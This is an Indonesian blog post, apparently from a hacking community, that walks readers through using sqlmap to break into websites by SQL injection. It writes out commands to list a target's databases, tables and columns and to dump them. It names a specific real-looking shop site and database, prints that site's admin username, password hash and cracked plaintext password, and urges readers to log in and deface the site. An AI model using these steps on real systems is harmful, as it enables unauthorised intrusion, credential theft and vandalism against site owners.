SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.
[+} BAHAN [+]
- Python [windows download]
- Sqlmap [windows download]
[+] LANGKAHNYA MAS BRO [+]
(*Untuk Windows kalian cari dulu ke sini )
1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)
2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah
- /pentest/web/scanners/sqlmap /
3. Ketikan printah ini :
- python ./sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
setelah itu klik enter, maka akan muncul Database Target (*See Image)
4. Setelah dapet nama Data Basenya kita ketikan printah :
- python ./sqlmap.py -u http://TARGET.com -D nama_database -tables
Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables [tekan enter] hasil :
5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :
- python ./sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :
- python ./sqlmap.py -u http://www.target.com -D nama_database -T table --dump
Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"
- do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :
nah itu kita dapetin User + Passwordnya :D
User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624
Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :
Nah setelah saya Decrypt ane dapetin nih :
Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$
Sekarang tinggal login ke admin dan tebas deh :D
HASIL :
masih kena deface tuh : http://www.vana-shop.com/
dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD
Semoga berhasil :)
Sumber : http://porzcommunity.binushacker.net
Tidak ada komentar:
Posting Komentar